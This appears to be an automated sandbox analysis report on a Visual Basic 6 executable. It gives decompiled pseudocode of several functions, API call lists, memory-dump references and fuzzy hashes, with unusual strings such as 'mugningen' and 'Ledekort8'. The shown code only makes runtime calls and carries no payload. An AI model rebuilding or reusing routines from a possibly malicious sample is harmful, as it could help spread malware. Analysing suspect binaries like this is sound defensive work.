                                  0x0041037f
                                  0x00410384
                                  0x00410389
                                  0x00410389
                                  0x00410399
                                  0x0041039e
                                  0x004103a4
                                  0x004103a7
                                  0x004103b3
                                  0x004103b7
                                  0x004103c5
                                  0x004103c8
                                  0x004103ca
                                  0x004103d1
                                  0x004103ea
                                  0x004103d3
                                  0x004103d3
                                  0x004103d5
                                  0x004103da
                                  0x004103dd
                                  0x004103e0
                                  0x004103e5
                                  0x004103e5
                                  0x004103f1
                                  0x004103f1
                                  0x004103f6
                                  0x00410425
                                  0x0041042a

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004102DD
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 004102F5
                                  • #670.MSVBVM60(?,?,?,?,?,004014F6), ref: 004102FE
                                  • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00410319
                                  • __vbaFreeVar.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00410325
                                  • __vbaHresultCheckObj.MSVBVM60(?,?,0040256C,00000160), ref: 00410363
                                  • __vbaNew2.MSVBVM60(00402774,0041333C), ref: 00410384
                                  • __vbaObjSet.MSVBVM60(?,?,mugningen), ref: 004103B7
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,00000040), ref: 004103E0
                                  • __vbaFreeObj.MSVBVM60(00000000,?,00402764,00000040), ref: 004103F1
                                  • __vbaFreeStr.MSVBVM60(0041042B,00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00410425
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CheckHresult$#670ChkstkCopyNew2
                                  • String ID: <3A$Ferae$mugningen
                                  • API String ID: 2979437685-3828315376
                                  • Opcode ID: f55bd0cb2872a15fbaeda83856c475c79eb929bbcafd8b52bcb438348a87b837
                                  • Instruction ID: 80d223455f543dc6c9f2b7f622ff95b75ec4bcda917262a4f166de68fe704996
                                  • Opcode Fuzzy Hash: f55bd0cb2872a15fbaeda83856c475c79eb929bbcafd8b52bcb438348a87b837
                                  • Instruction Fuzzy Hash: 5141D47090024DAFCF00EFE5CD89BDEBBB8BB04705F50842AE515BB2A1D7B95985CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411733, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 88COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E00411733(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				char _v48;
				char _v64;
				intOrPtr _v88;
				intOrPtr _v96;
				signed int _v104;
				char _v112;
				void* _v116;
				signed int _v120;
				char _v132;
				signed int _v136;
				short _t49;
				signed int _t52;
				void* _t67;
				void* _t69;
				intOrPtr _t70;

				_t70 = _t69 - 0xc;
				 *[fs:0x0] = _t70;
				L004014F0();
				_v16 = _t70;
				_v12 = 0x4013e8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x4014f6, _t67);
				L004016A6();
				_v88 = 0x402d9c;
				_v96 = 8;
				L00401634();
				_push( &_v48);
				_push( &_v64);
				L004015A4();
				_v104 = _v104 & 0x00000000;
				_v112 = 0x8008;
				_push( &_v64);
				_t49 =  &_v112;
				_push(_t49);
				L0040165E();
				_v116 = _t49;
				_push( &_v64);
				_push( &_v48);
				_push(2);
				L00401676();
				_t52 = _v116;
				if(_t52 != 0) {
					if( *0x41333c != 0) {
						_v132 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x402774);
						L004016B8();
						_v132 = 0x41333c;
					}
					_t26 =  &_v132; // 0x41333c
					_v116 =  *((intOrPtr*)( *_t26));
					_t28 =  &_v32; // 0x41333c
					_t52 =  *((intOrPtr*)( *_v116 + 0x48))(_v116, 0x72, _t28);
					asm("fclex");
					_v120 = _t52;
					if(_v120 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x402764);
						_push(_v116);
						_push(_v120);
						L004016B2();
						_v136 = _t52;
					}
					L0040169A();
				}
				_push(0x41187e);
				L0040169A();
				return _t52;
			}























                                  0x00411736
                                  0x00411745
                                  0x0041174f
                                  0x00411757
                                  0x0041175a
                                  0x00411761
                                  0x00411770
                                  0x00411779
                                  0x0041177e
                                  0x00411785
                                  0x00411792
                                  0x0041179a
                                  0x0041179e
                                  0x0041179f
                                  0x004117a4
                                  0x004117a8
                                  0x004117b2
                                  0x004117b3
                                  0x004117b6
                                  0x004117b7
                                  0x004117bc
                                  0x004117c3
                                  0x004117c7
                                  0x004117c8
                                  0x004117ca
                                  0x004117d2
                                  0x004117d8
                                  0x004117e1
                                  0x004117fb
                                  0x004117e3
                                  0x004117e3
                                  0x004117e8
                                  0x004117ed
                                  0x004117f2
                                  0x004117f2
                                  0x00411802
                                  0x00411807
                                  0x0041180a
                                  0x00411818
                                  0x0041181b
                                  0x0041181d
                                  0x00411824
                                  0x00411840
                                  0x00411826
                                  0x00411826
                                  0x00411828
                                  0x0041182d
                                  0x00411830
                                  0x00411833
                                  0x00411838
                                  0x00411838
                                  0x0041184a
                                  0x0041184a
                                  0x0041184f
                                  0x00411878
                                  0x0041187d

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0041174F
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00411779
                                  • __vbaVarDup.MSVBVM60 ref: 00411792
                                  • #666.MSVBVM60(?,?), ref: 0041179F
                                  • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?), ref: 004117B7
                                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 004117CA
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,?,?,004014F6), ref: 004117ED
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,00000048), ref: 00411833
                                  • __vbaFreeStr.MSVBVM60(00000000,?,00402764,00000048), ref: 0041184A
                                  • __vbaFreeStr.MSVBVM60(0041187E,?,?,004014F6), ref: 00411878
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$#666CheckChkstkCopyHresultListNew2
                                  • String ID: <3A$<3A$tmp
                                  • API String ID: 1011223040-178683147
                                  • Opcode ID: 0e802e202c7669571e45b10be1a7f9a1cb93664554610d5d2ca9cdddc6015ded
                                  • Instruction ID: 19c412a2c87474bec559324974a430bf91ed2a2262c4889cacd9450e5b0c2507
                                  • Opcode Fuzzy Hash: 0e802e202c7669571e45b10be1a7f9a1cb93664554610d5d2ca9cdddc6015ded
                                  • Instruction Fuzzy Hash: 9431F971D00208AFDB10EFA5CD45BDEB7B8BF04704F10852AE511B72A1DB799949CF59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410A5E, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00410A5E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				signed int _v40;
				void* _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v100;
				char _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _t46;
				signed int _t52;
				signed int _t58;
				intOrPtr _t72;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_t46 = 0x5c;
				L004014F0();
				_v12 = _t72;
				_v8 = 0x401358;
				_push(0x402c04);
				L00401604();
				L0040160A();
				L00401646();
				asm("fcomp qword [0x401350]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x41333c != 0) {
						_v104 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x402774);
						L004016B8();
						_v104 = 0x41333c;
					}
					_t5 =  &_v104; // 0x41333c
					_v80 =  *((intOrPtr*)( *_t5));
					_t52 =  *((intOrPtr*)( *_v80 + 0x1c))(_v80,  &_v44);
					asm("fclex");
					_v84 = _t52;
					if(_v84 >= 0) {
						_t16 =  &_v108;
						 *_t16 = _v108 & 0x00000000;
						__eflags =  *_t16;
					} else {
						_push(0x1c);
						_push(0x402764);
						_push(_v80);
						_push(_v84);
						L004016B2();
						_v108 = _t52;
					}
					_v88 = _v44;
					_v68 = 0x80020004;
					_v76 = 0xa;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t58 =  *((intOrPtr*)( *_v88 + 0x5c))(_v88, 0x10,  &_v40);
					asm("fclex");
					_v92 = _t58;
					if(_v92 >= 0) {
						_t32 =  &_v112;
						 *_t32 = _v112 & 0x00000000;
						__eflags =  *_t32;
					} else {
						_push(0x5c);
						_push(0x402c08);
						_push(_v88);
						_push(_v92);
						L004016B2();
						_v112 = _t58;
					}
					_v100 = _v40;
					_v40 = _v40 & 0x00000000;
					_t46 = _v100;
					_v52 = _t46;
					_v60 = 8;
					L004015FE();
					L004016AC();
				}
				asm("wait");
				_push(0x410bc1);
				L0040167C();
				return _t46;
			}
























                                  0x00410a63
                                  0x00410a6e
                                  0x00410a6f
                                  0x00410a78
                                  0x00410a79
                                  0x00410a81
                                  0x00410a84
                                  0x00410a8b
                                  0x00410a90
                                  0x00410a95
                                  0x00410a9a
                                  0x00410a9f
                                  0x00410aa5
                                  0x00410aa7
                                  0x00410aa8
                                  0x00410ab5
                                  0x00410acf
                                  0x00410ab7
                                  0x00410ab7
                                  0x00410abc
                                  0x00410ac1
                                  0x00410ac6
                                  0x00410ac6
                                  0x00410ad6
                                  0x00410adb
                                  0x00410aea
                                  0x00410aed
                                  0x00410aef
                                  0x00410af6
                                  0x00410b0f
                                  0x00410b0f
                                  0x00410b0f
                                  0x00410af8
                                  0x00410af8
                                  0x00410afa
                                  0x00410aff
                                  0x00410b02
                                  0x00410b05
                                  0x00410b0a
                                  0x00410b0a
                                  0x00410b16
                                  0x00410b19
                                  0x00410b20
                                  0x00410b2e
                                  0x00410b38
                                  0x00410b39
                                  0x00410b3a
                                  0x00410b3b
                                  0x00410b44
                                  0x00410b47
                                  0x00410b49
                                  0x00410b50
                                  0x00410b69
                                  0x00410b69
                                  0x00410b69
                                  0x00410b52
                                  0x00410b52
                                  0x00410b54
                                  0x00410b59
                                  0x00410b5c
                                  0x00410b5f
                                  0x00410b64
                                  0x00410b64
                                  0x00410b70
                                  0x00410b73
                                  0x00410b77
                                  0x00410b7a
                                  0x00410b7d
                                  0x00410b8a
                                  0x00410b92
                                  0x00410b92
                                  0x00410b97
                                  0x00410b98
                                  0x00410bbb
                                  0x00410bc0

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410A79
                                  • __vbaR8Str.MSVBVM60(00402C04,?,?,?,?,004014F6), ref: 00410A90
                                  • __vbaFPFix.MSVBVM60(00402C04,?,?,?,?,004014F6), ref: 00410A95
                                  • __vbaFpR8.MSVBVM60(00402C04,?,?,?,?,004014F6), ref: 00410A9A
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,00402C04,?,?,?,?,004014F6), ref: 00410AC1
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,0000001C), ref: 00410B05
                                  • __vbaChkstk.MSVBVM60(?), ref: 00410B2E
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402C08,0000005C), ref: 00410B5F
                                  • __vbaVarMove.MSVBVM60(00000000,?,00402C08,0000005C), ref: 00410B8A
                                  • __vbaFreeObj.MSVBVM60(00000000,?,00402C08,0000005C), ref: 00410B92
                                  • __vbaFreeVar.MSVBVM60(00410BC1,00402C04,?,?,?,?,004014F6), ref: 00410BBB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckChkstkFreeHresult$MoveNew2
                                  • String ID: <3A
                                  • API String ID: 2954588148-662753744
                                  • Opcode ID: 96887bb201df0489de35f293e176646f26829b418ec20da2cbbf3ef9111e7ed8
                                  • Instruction ID: af40cafd035b99c5ef04d887350f6120604dd1e2dd5fd3da83ed9da75cc3561a
                                  • Opcode Fuzzy Hash: 96887bb201df0489de35f293e176646f26829b418ec20da2cbbf3ef9111e7ed8
                                  • Instruction Fuzzy Hash: C041E270940308EFDB00EFD5C985BDEBBB4BF08709F20442AE401BB2A1C7B96985CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004115B5, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 113COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E004115B5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				signed int _v52;
				void* _v56;
				signed int _v60;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				signed int _v80;
				void* _t54;
				char* _t55;
				signed int _t59;
				signed int _t63;
				signed int _t69;
				void* _t82;
				intOrPtr _t84;

				 *[fs:0x0] = _t84;
				_t54 = 0x3c;
				L004014F0();
				_v12 = _t84;
				_v8 = 0x4013d8;
				L00401622();
				_t55 =  &_v24;
				L00401652();
				_v48 = _t55;
				_t59 =  *((intOrPtr*)( *_v48 + 0x1c))(_v48,  &_v44, _t55, _t54, __edi, __esi, __ebx,  *[fs:0x0], 0x4014f6, __ecx, __ecx, _t82);
				asm("fclex");
				_v52 = _t59;
				if(_v52 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x402bb0);
					_push(_v48);
					_push(_v52);
					L004016B2();
					_v68 = _t59;
				}
				_v56 =  ~(0 | _v44 != 0x00000000);
				L004016AC();
				_t63 = _v56;
				if(_t63 != 0) {
					if( *0x41333c != 0) {
						_v72 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x402774);
						L004016B8();
						_v72 = 0x41333c;
					}
					_v48 =  *_v72;
					_t69 =  *((intOrPtr*)( *_v48 + 0x4c))(_v48,  &_v24);
					asm("fclex");
					_v52 = _t69;
					if(_v52 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x402764);
						_push(_v48);
						_push(_v52);
						L004016B2();
						_v76 = _t69;
					}
					_v56 = _v24;
					_v32 = 1;
					_v40 = 2;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t63 =  *((intOrPtr*)( *_v56 + 0x2c))(_v56, 0x10);
					asm("fclex");
					_v60 = _t63;
					if(_v60 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x2c);
						_push(0x402b80);
						_push(_v56);
						_push(_v60);
						L004016B2();
						_v80 = _t63;
					}
					L004016AC();
				}
				_push(0x411720);
				return _t63;
			}
























                                  0x004115c6
                                  0x004115cf
                                  0x004115d0
                                  0x004115d8
                                  0x004115db
                                  0x004115e2
                                  0x004115e8
                                  0x004115ec
                                  0x004115f1
                                  0x00411600
                                  0x00411603
                                  0x00411605
                                  0x0041160c
                                  0x00411625
                                  0x0041160e
                                  0x0041160e
                                  0x00411610
                                  0x00411615
                                  0x00411618
                                  0x0041161b
                                  0x00411620
                                  0x00411620
                                  0x00411634
                                  0x0041163b
                                  0x00411640
                                  0x00411646
                                  0x00411653
                                  0x0041166d
                                  0x00411655
                                  0x00411655
                                  0x0041165a
                                  0x0041165f
                                  0x00411664
                                  0x00411664
                                  0x00411679
                                  0x00411688
                                  0x0041168b
                                  0x0041168d
                                  0x00411694
                                  0x004116ad
                                  0x00411696
                                  0x00411696
                                  0x00411698
                                  0x0041169d
                                  0x004116a0
                                  0x004116a3
                                  0x004116a8
                                  0x004116a8
                                  0x004116b4
                                  0x004116b7
                                  0x004116be
                                  0x004116c8
                                  0x004116d2
                                  0x004116d3
                                  0x004116d4
                                  0x004116d5
                                  0x004116de
                                  0x004116e1
                                  0x004116e3
                                  0x004116ea
                                  0x00411703
                                  0x004116ec
                                  0x004116ec
                                  0x004116ee
                                  0x004116f3
                                  0x004116f6
                                  0x004116f9
                                  0x004116fe
                                  0x004116fe
                                  0x0041170a
                                  0x0041170a
                                  0x0041170f
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004115D0
                                  • #685.MSVBVM60(?,?,?,?,004014F6), ref: 004115E2
                                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,004014F6), ref: 004115EC
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402BB0,0000001C,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041161B
                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041163B
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041165F
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,0000004C), ref: 004116A3
                                  • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004116C8
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402B80,0000002C), ref: 004116F9
                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041170A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckHresult$ChkstkFree$#685New2
                                  • String ID: <3A
                                  • API String ID: 2284028277-662753744
                                  • Opcode ID: c7e1ae91f52709c88923846345569167bd749e5d0762a32062c5c1552e11f819
                                  • Instruction ID: f536f364b2b029a36143769028b272b229363377ac17d0b1c82c465ffde4c345
                                  • Opcode Fuzzy Hash: c7e1ae91f52709c88923846345569167bd749e5d0762a32062c5c1552e11f819
                                  • Instruction Fuzzy Hash: 85411670D00208EFCB00EFA5D949FDEBBB5BF08704F20442AF501B72A1D7B959859B29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004120AF, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E004120AF(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				signed int _v32;
				void* _v36;
				char _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _t51;
				signed int _t56;
				void* _t65;
				void* _t67;
				intOrPtr _t68;

				_t68 = _t67 - 0xc;
				 *[fs:0x0] = _t68;
				L004014F0();
				_v16 = _t68;
				_v12 = 0x401498;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4014f6, _t65);
				L004016A6();
				if( *0x41333c != 0) {
					_v68 = 0x41333c;
				} else {
					_push(0x41333c);
					_push(0x402774);
					L004016B8();
					_v68 = 0x41333c;
				}
				_t11 =  &_v68; // 0x41333c
				_v44 =  *((intOrPtr*)( *_t11));
				_t51 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v36);
				asm("fclex");
				_v48 = _t51;
				if(_v48 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x402764);
					_push(_v44);
					_push(_v48);
					L004016B2();
					_v72 = _t51;
				}
				_v52 = _v36;
				_t56 =  *((intOrPtr*)( *_v52 + 0x118))(_v52,  &_v40);
				asm("fclex");
				_v56 = _t56;
				if(_v56 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x402784);
					_push(_v52);
					_push(_v56);
					L004016B2();
					_v76 = _t56;
				}
				L00401664();
				_v32 = _t56;
				L004016AC();
				_push(0x4121cd);
				L0040169A();
				return _t56;
			}






















                                  0x004120b2
                                  0x004120c1
                                  0x004120cb
                                  0x004120d3
                                  0x004120d6
                                  0x004120dd
                                  0x004120ec
                                  0x004120f5
                                  0x00412101
                                  0x0041211b
                                  0x00412103
                                  0x00412103
                                  0x00412108
                                  0x0041210d
                                  0x00412112
                                  0x00412112
                                  0x00412122
                                  0x00412127
                                  0x00412136
                                  0x00412139
                                  0x0041213b
                                  0x00412142
                                  0x0041215b
                                  0x00412144
                                  0x00412144
                                  0x00412146
                                  0x0041214b
                                  0x0041214e
                                  0x00412151
                                  0x00412156
                                  0x00412156
                                  0x00412162
                                  0x00412171
                                  0x00412177
                                  0x00412179
                                  0x00412180
                                  0x0041219c
                                  0x00412182
                                  0x00412182
                                  0x00412187
                                  0x0041218c
                                  0x0041218f
                                  0x00412192
                                  0x00412197
                                  0x00412197
                                  0x004121a3
                                  0x004121a8
                                  0x004121af
                                  0x004121b4
                                  0x004121c7
                                  0x004121cc

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004120CB
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 004120F5
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,?,?,?,?,004014F6), ref: 0041210D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,00000014), ref: 00412151
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402784,00000118), ref: 00412192
                                  • __vbaI2I4.MSVBVM60 ref: 004121A3
                                  • __vbaFreeObj.MSVBVM60 ref: 004121AF
                                  • __vbaFreeStr.MSVBVM60(004121CD), ref: 004121C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckFreeHresult$ChkstkCopyNew2
                                  • String ID: <3A
                                  • API String ID: 746201682-662753744
                                  • Opcode ID: 778f041cdbe89b8f6f7116bd84c389c27a59e5f116e5efdb0de7c3c3d0d3a92f
                                  • Instruction ID: e2891b107960a2660dbe360d294410c266579985cb9aa5ab39f0bcd02f709ed6
                                  • Opcode Fuzzy Hash: 778f041cdbe89b8f6f7116bd84c389c27a59e5f116e5efdb0de7c3c3d0d3a92f
                                  • Instruction Fuzzy Hash: F631D470900208EFCF00EF95CA85FDDBBB4BF08704F14842AE501B72A1C7B999959F58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004112BC, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 52COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004112BC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v36;
				char _v52;
				char* _v60;
				intOrPtr _v68;
				short _v72;
				signed int _t21;
				char* _t25;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t38 = _t37 - 0xc;
				 *[fs:0x0] = _t38;
				L004014F0();
				_v16 = _t38;
				_v12 = 0x4013a8;
				_v8 = 0;
				_t21 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x4014f6, _t35);
				_push(0x402cec);
				L004015BC();
				L0040161C();
				_push(_t21);
				_push(0x402cf8);
				L00401694();
				asm("sbb eax, eax");
				_v72 =  ~( ~( ~_t21));
				L0040169A();
				_t25 = _v72;
				if(_t25 != 0) {
					_v60 = L"Ledekort8";
					_v68 = 8;
					L00401634();
					_t25 =  &_v52;
					_push(_t25);
					L004015B6();
					L0040167C();
				}
				asm("wait");
				_push(0x41137b);
				return _t25;
			}
















                                  0x004112bf
                                  0x004112ce
                                  0x004112d8
                                  0x004112e0
                                  0x004112e3
                                  0x004112ea
                                  0x004112f9
                                  0x004112fc
                                  0x00411301
                                  0x0041130b
                                  0x00411310
                                  0x00411311
                                  0x00411316
                                  0x0041131d
                                  0x00411323
                                  0x0041132a
                                  0x0041132f
                                  0x00411335
                                  0x00411337
                                  0x0041133e
                                  0x0041134b
                                  0x00411350
                                  0x00411353
                                  0x00411354
                                  0x0041135c
                                  0x0041135c
                                  0x00411361
                                  0x00411362
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004112D8
                                  • #713.MSVBVM60(00402CEC,?,?,?,?,004014F6), ref: 00411301
                                  • __vbaStrMove.MSVBVM60(00402CEC,?,?,?,?,004014F6), ref: 0041130B
                                  • __vbaStrCmp.MSVBVM60(00402CF8,00000000,00402CEC,?,?,?,?,004014F6), ref: 00411316
                                  • __vbaFreeStr.MSVBVM60(00402CF8,00000000,00402CEC,?,?,?,?,004014F6), ref: 0041132A
                                  • __vbaVarDup.MSVBVM60 ref: 0041134B
                                  • #529.MSVBVM60(?), ref: 00411354
                                  • __vbaFreeVar.MSVBVM60(?), ref: 0041135C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$#529#713ChkstkMove
                                  • String ID: Ledekort8
                                  • API String ID: 3668040345-3639059750
                                  • Opcode ID: 1ce0c65839f84ea23af1ed321be7102f7943d0e94bc23624a7ac87a47a67bf85
                                  • Instruction ID: 945c88839c476f31d5dd0dd450f86d8dececb9a155c32ea1c9c874daca1457c8
                                  • Opcode Fuzzy Hash: 1ce0c65839f84ea23af1ed321be7102f7943d0e94bc23624a7ac87a47a67bf85
                                  • Instruction Fuzzy Hash: 8F114C70950209ABDB00EBA5CD45FEDBBB8BF44B04F10452AF401BB1E1DB785905CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410BD4, Relevance: 15.1, APIs: 10, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00410BD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a40, void* _a44) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v40;
				char _v48;
				char _v64;
				char* _t24;
				intOrPtr _t40;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x40);
				L004014F0();
				_v12 = _t40;
				_v8 = 0x401368;
				L004016A6();
				L004016A6();
				_v40 = 2;
				_v48 = 2;
				_push( &_v48);
				_push( &_v64);
				L004015F2();
				_push( &_v64);
				L004015F8();
				L0040161C();
				_push( &_v64);
				_t24 =  &_v48;
				_push(_t24);
				_push(2);
				L00401676();
				_push(0x410c8a);
				L0040169A();
				L0040169A();
				L0040169A();
				return _t24;
			}













                                  0x00410bd9
                                  0x00410be4
                                  0x00410be5
                                  0x00410bec
                                  0x00410bef
                                  0x00410bf7
                                  0x00410bfa
                                  0x00410c07
                                  0x00410c12
                                  0x00410c17
                                  0x00410c1e
                                  0x00410c28
                                  0x00410c2c
                                  0x00410c2d
                                  0x00410c35
                                  0x00410c36
                                  0x00410c40
                                  0x00410c48
                                  0x00410c49
                                  0x00410c4c
                                  0x00410c4d
                                  0x00410c4f
                                  0x00410c57
                                  0x00410c74
                                  0x00410c7c
                                  0x00410c84
                                  0x00410c89

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410BEF
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410C07
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410C12
